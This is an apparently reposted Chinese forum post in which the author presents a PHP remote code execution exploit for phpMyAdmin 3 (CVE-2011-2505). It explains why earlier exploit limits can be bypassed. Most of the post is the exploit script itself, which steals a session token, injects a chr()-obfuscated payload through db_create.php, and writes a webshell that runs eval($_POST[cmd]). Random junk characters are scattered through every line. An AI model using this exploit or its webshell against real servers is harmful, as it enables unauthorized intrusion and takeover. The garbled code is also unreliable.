最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。
4 F+ }5 X1 E! [* d/ n
- i$ j6 Z* `2 I& S! G3 R昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了翻,写出了这个冷饭exp,由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。
$ L! ]: f2 P( B3 {0 |$ `0 F, o# t; j( z6 u8 d$ p3 m
首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:7 G1 T# y O0 Y. R1 x; p1 ~7 v
一是session.auto_start = 1;
2 H, m" ]1 r8 R/ D二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。" l' L1 X% y* T* d/ h. d; ~6 t& b
当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。" C! Q+ P& X1 `& \: x
( _6 e5 d/ \! Z" R2 ^0 x7 l在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。
9 K8 }+ H! n. `; i9 D9 }
1 s# H2 O5 x' f9 p5 T& D2 g4 F于是写了这个php版本的exp,代码如下:1 v/ x, B a+ ]1 a7 b# e' L; q
7 h: q. q- V6 v/ V" [#!/usr/bin/php
( G" G7 R1 @% y$ Y" Y+ n<?php8 P0 R$ N' k% A I! E5 ?4 Z
print_r('
2 m$ t+ T, ]+ E2 o8 B5 M' B6 y+---------------------------------------------------------------------------+
! K- m! Z! |0 S5 npma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]" I$ |- y" ~, H8 D
by oldjun(www.oldjun.com)
: J6 n- C2 Z- D" Y& }) ~: V% W0 Mwelcome to www.t00ls.net! G% m5 M+ S* I" m* p: _0 Q# v
mail: oldjun@gmail.com
. _3 n8 \5 O! D4 S! k( i+ ^Assigned CVE id: CVE-2011-2505
9 K% U* h/ k0 Y" w0 I5 L& T+---------------------------------------------------------------------------+
. Y" a! O* `1 H7 D8 z3 Y');
: D6 c, ]: y* F$ ~0 A# j- e# T" s) Z! e
/**
* V5 l' _% ^( }) Z * working when the directory:"config" exists and is writeable.0 W/ s2 M1 ? s+ ?
**/
2 u7 \, N5 n8 `- U# v! b
: o9 D, D" I8 Lif ($argc < 3) {9 |: E+ ^5 C* G! l W) k# C6 {
print_r('
1 x/ f( k# i5 y+ w& s. h+---------------------------------------------------------------------------+) _8 K6 N% m# ~2 ?, k9 m# }! c O
Usage: php '.$argv[0].' host path* J( h, G6 M2 h1 x" \! p9 {7 i. Q
host: target server (ip/hostname)
/ h. r9 I1 v5 t. mpath: path to pma3
T+ l8 a" J) OExample:
; o2 c& U6 J8 G2 z {php '.$argv[0].' localhost /pma// u- b2 t* }4 b! ^& B* k. {
+---------------------------------------------------------------------------+
, H$ ?( x2 z. K& Q) @0 M');
1 d4 c6 k! x5 }+ m7 d: ` exit;8 E7 E" `, N8 F4 S5 E7 E4 k. Z
}
* g0 _- m" J- Y; d9 `* u- a. J
: \- L3 x; K9 Q$ C7 R% X/ ]$host = $argv[1];6 ~3 a6 Y8 o, h
$path = $argv[2];$ B5 z" k. p% x, Z! m2 d# S! n0 H
6 @6 J: f5 O9 u* K( k) X
/**
7 S& J* |2 M, [/ t3 m! E7 v: x * Try to determine if the directory:"config" exists6 a1 S: d6 ^' ?# q, n/ C+ K
**/$ w# }2 l) ]2 ~" y- m
echo "[+] Try to determine if the directory:config exists....\n";
1 h/ F! N& h$ S' f( S$returnstr=php_request('config/');1 B3 a7 Z+ G/ O
if(strpos($returnstr,'404')){
. ?5 Z( Y" C! w. w+ X' _# f3 ?* F/ Y exit("[-] Exploit Failed! The directory:config do not exists!\n");
1 o5 x( [5 G9 L% \}
7 ~9 i* Q, J% `# ^4 y/ I
, c) t1 q9 T+ h: X7 R6 _% i/**, R/ P1 X: p+ `% x2 p
* Try to get token and sessionid
2 e5 J, K' S$ K" ]5 b**/! B" R" S+ }$ Z
echo "[+] Try to get token and sessionid....\n";! g1 y- W9 r' n, g+ {. x
$result=php_request('index.php');
, ]; Z, Q6 Y% opreg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);# h2 ]% \; D1 m. @
$token=$resp[3];
) K; ~) R1 Q0 ^, e- M1 Y) i$ L) N$sessionid=$resp[1];
# u. f/ \+ @' k& L C' Yif($token && $sessionid){! @" J) a$ h! Y, n
echo "[+] token token\n";
0 @$ ] j& R a echo "[+] Session IDsessionid\n";
; [+ A: ?6 l' j( s' n$ x}else{
7 ]0 \1 r7 e7 u6 l" `! N4 Q7 k exit("[-] Can't get token and Session ID,Exploit Failed!\n");
+ U- N% P9 r; V, ~/ ^: B}! G( f1 V2 b' `0 U' j F
$ _0 X2 V' l, Y6 y8 G/**
& h9 E7 p q0 L6 l * Try to insert shell into session
# b& k0 H' w4 N1 ^/ L$ r**/
I3 |( i0 r/ h7 Pecho "[+] Try to insert shell into session....\n";
* s2 H w9 v1 Z6 {# G# e4 ^$ Hphp_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.
& t, r. i3 u% ^" r4 f
0 r: `# i1 c6 ^: I) }% `1 `/ c/**" [+ |! m# o9 i8 f( ~* m
* Try to create webshell
0 N; j: x! v8 b' U1 U/ {' E**/' z' a* O/ `% x* B2 @9 @8 E
echo "[+] Try to create webshell....\n";+ e8 D" R8 \4 m/ S
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);/ w9 Q1 t$ K& i* S' A
/**8 n+ |. }$ ~. w% a& e
* Try to check if the webshell was created successfully4 X/ p6 J5 O; N
**/" T, A. `2 ~) J" _- X
echo "[+] Try to check if the webshell was created successfully....\n";
. q6 F& f- h* K3 h x, \$content=php_request('config/config.inc.php');
1 c5 D- h3 I+ C% u4 Wif(strpos($content,'t00ls')){/ c# x( g. U6 ^ n9 g# y
echo "[+] Congratulations! Expoilt successfully....\n";
/ ~. e& j; Y: }% e echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
! A* e1 ]/ j2 b}else{
' x( I9 b$ e9 C exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
& \& V& v" ~0 \}
h/ E) z# ~. q; _, H1 j! w5 C' E, v! R
function php_request($url,$data='',$cookie=''){4 q3 _6 z: j. _' a+ B" S6 P
global $host, $path;" X B- [5 E" u: ^8 T; E
! A, K3 l' z$ w9 c $method=$data?'POST':'GET';
* @, t# e* H9 [3 G 2 p; k) o4 F( A$ l8 `0 r* |
$packet = $method." ".$path.$url." HTTP/1.1\r\n";
% B( |1 M: A+ D" a0 ]/ M @ $packet .= "Accept: */*\r\n";- W5 K, E$ L: z% c& d: M
$packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";4 a. l1 K9 A' `2 i2 W+ @
$packet .= "Host: $host\r\n";
8 l M. q' T+ k' h: z [ $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";
8 ]% _* U7 ?9 A. V $packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";+ c8 A: S3 l1 m- g; q
$packet .= $cookie?"Cookie: $cookie\r\n":"";
# D6 D' R$ s# f $packet .= "Connection: Close\r\n\r\n";
p( f' C2 P7 s& M. g2 y. }. { $packet .= $data?$data:"";+ D6 y1 g* b$ i/ [ S4 o
. V9 ?5 q) h% P- W3 F/ D$ Z* A4 y $fp = fsockopen(gethostbyname($host), 80);
- U- N- ^2 Y. G' U t3 E4 L if (!$fp) {( g6 ]# h7 z" y3 L7 c
echo 'No response from '.$host; die;
+ i k$ ~/ v6 C1 o' Z& E3 b }
0 \; R. o# y4 e. E$ x# W fputs($fp, $packet);
" h( o/ g4 K8 u% w% n, T; N0 V! _- b# E: g
$resp = '';. B4 }( t m8 Y2 q( r
1 @5 D* l1 e0 p9 X7 {% L while ($fp && !feof($fp))
, x6 f- ]: ~! c3 w, y$ Z $resp .= fread($fp, 1024);
7 [9 O3 k/ o" `2 W+ g( h7 f. H0 i6 X3 R
( {9 D2 q7 O9 ` o1 ~8 u return $resp;$ M6 n! V; ?' a5 r/ r5 _ Z
}: m( f$ W2 f7 q6 B1 H/ `
% p0 B `" h9 @
?> 3 o2 F* |) ]$ W
. |
发表于 2013-2-21 09:13:03
收藏
支持
反对